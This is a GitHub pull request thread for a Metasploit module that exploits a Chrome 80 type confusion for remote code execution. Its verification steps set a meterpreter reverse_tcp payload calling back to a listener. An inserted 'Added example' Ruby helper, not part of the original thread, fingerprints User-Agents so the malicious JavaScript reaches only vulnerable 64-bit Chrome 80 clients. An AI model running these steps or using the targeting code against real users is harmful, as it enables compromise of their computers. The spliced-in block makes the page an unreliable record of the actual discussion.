
Google Chrome 80 JSCreate side-effect type confusion exploit #13008

Merged
merged 4 commits into from Mar 4, 2020

Conversation

@timwr

timwr commented Feb 29, 2020

Tested on Windows 10 running Google Chrome (64-bit) 80.0.3987.87 (e.g. https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/).
Thankfully(!) there is no sandbox escape, so you'll need to run Chrome with --no-sandbox.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run the exploit:
      use exploit/multi/browser/chrome_jscreate_sideeffect
      set SRVHOST 192.168.56.1
      set URIPATH /
      set PAYLOAD windows/x64/meterpreter/reverse_tcp
      set LHOST 192.168.56.1
      run
  • Verify you get a meterpreter session
@timwr timwr added the needs-docs label Feb 29, 2020
@adamgalway-r7 adamgalway-r7 self-assigned this Mar 3, 2020
adamgalway-r7 left a comment

Tested and working as expected, good work! A few QoL changes, add docs, and it's good to go 👍

@space-r7 space-r7 added the module label Mar 3, 2020
Co-Authored-By: adamgalway-r7 <54621924+adamgalway-r7@users.noreply.github.com>
@timwr

timwr commented Mar 4, 2020

So this does work identically on OSX for the same version (https://dl.google.com/release2/chrome/AJkrrB9igve6Mz4STD5utjA_80.0.3987.87/GoogleChrome-80.0.3987.87.dmg):
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox
You'll need an OSX payload, e.g.:
set payload osx/x64/meterpreter/reverse_tcp

@timwr

timwr commented Mar 4, 2020

Linux will presumably also work identically, as well as 64-bit Chrome on Android (Google Chrome Dev).
Supporting 32-bit requires rewriting the exploit (ping @AmesianX), but that would add support for 32-bit (or WOW64) Windows, as well as the stable (default) version on Android.
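Added example, not code from this PR or from the module itself: a standalone Ruby helper that gates on the client User-Agent the way a practitioner would want before serving a payload built for one browser build. It accepts only Google Chrome 80.0.3987.87 on platforms the thread identifies as 64-bit, rejects the 32-bit and WOW64 Windows builds and Android (whose UA does not expose bitness), and marks Linux x86_64 as presumed rather than tested, following the comments above. The function name `classify_target` and the UA strings are constructed for illustration; it does not use Metasploit's own browser-detection API, and it cannot tell whether the browser was launched with --no-sandbox, which the module still requires.

```ruby
# Added example (not code from the PR or the module): decide from the
# User-Agent whether a client looks like the build this module targets,
# Google Chrome 80.0.3987.87 on a 64-bit platform. 32-bit / WOW64 Windows
# builds and stable Android Chrome are out of scope per the PR discussion.
# Nothing here can detect whether --no-sandbox was used.

TARGET_CHROME = '80.0.3987.87'.freeze

# Returns { target: true/false, reason: String }.
def classify_target(ua)
  # Google Chrome advertises "Chrome/<major>.<minor>.<build>.<patch>".
  # Chrome on iOS uses "CriOS/" and is a WebKit shell, so it never matches.
  m = ua.match(%r{Chrome/(\d+\.\d+\.\d+\.\d+)})
  return { target: false, reason: 'not Chrome' } unless m

  # Other Chromium browsers carry the same Chrome/ token plus their own
  # (e.g. "Edg/", "OPR/"); the PR only tested Google Chrome, so keep them out.
  if ua =~ %r{\b(Edg|OPR)/}
    return { target: false, reason: 'Chromium-based but not Google Chrome' }
  end

  version = m[1]
  unless version == TARGET_CHROME
    return { target: false, reason: "Chrome #{version} is not #{TARGET_CHROME}" }
  end

  case ua
  when /Android/
    # Android UAs contain "Linux;" but never the CPU width, and the stable
    # channel is the 32-bit build on many devices, so it cannot be confirmed.
    { target: false, reason: 'Android: bitness not determinable from UA' }
  when /Windows NT/
    if ua.include?('Win64; x64')
      { target: true, reason: 'Windows: 64-bit Chrome (tested in the PR)' }
    elsif ua.include?('WOW64')
      { target: false, reason: 'Windows: 32-bit Chrome under WOW64 (unsupported)' }
    else
      { target: false, reason: 'Windows: 32-bit Chrome (unsupported)' }
    end
  when /Macintosh/
    # Chrome for macOS has shipped only 64-bit builds for several years.
    { target: true, reason: 'macOS: 64-bit Chrome (tested in the PR)' }
  when /Linux x86_64/
    { target: true, reason: 'Linux: 64-bit Chrome (presumed, untested in the PR)' }
  else
    { target: false, reason: 'unrecognised platform' }
  end
end

# Constructed sample UAs in the standard Chrome format (not captured traffic).
SAMPLE_UAS = [
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36',
  'Mozilla/5.0 (Linux; Android 10; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Mobile Safari/537.36'
].freeze

if $PROGRAM_NAME == __FILE__
  SAMPLE_UAS.each do |ua|
    r = classify_target(ua)
    puts "#{r[:target] ? 'TARGET' : 'skip  '}  #{r[:reason]}"
  end
end
```

Run it directly to see the verdict for each sample; in a module you would call the classifier on the incoming request's User-Agent and only serve the JavaScript when it returns target: true, logging the reason otherwise.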

@timwr timwr force-pushed the timwr:cve_2020_6418 branch from 1a71be5 to fd4dcd5 Mar 4, 2020
@timwr timwr force-pushed the timwr:cve_2020_6418 branch from fd4dcd5 to 9f55e41 Mar 4, 2020
@timwr timwr removed the needs-docs label Mar 4, 2020
@adamgalway-r7 adamgalway-r7 merged commit 83132dd into rapid7:master Mar 4, 2020
3 checks passed
  Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  Metasploit Automation - Test Execution: Successfully completed all tests.
  continuous-integration/travis-ci/pr: The Travis CI build passed
@adamgalway-r7

adamgalway-r7 commented Mar 4, 2020

Release Notes

Adds an exploit module for Google Chrome 80. The module starts a web page hosting malicious JavaScript that, when visited by a vulnerable version of Chrome, allows Remote Code Execution on a remote machine. Currently only possible with the --no-sandbox Chrome flag in use.

@Vikec

Vikec commented Mar 14, 2020

Why not run on Chrome 79?

@bcoles

bcoles commented Mar 14, 2020

Why not run on Chrome 79?

This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The browser must be run with the --no-sandbox option for the payload to work correctly.
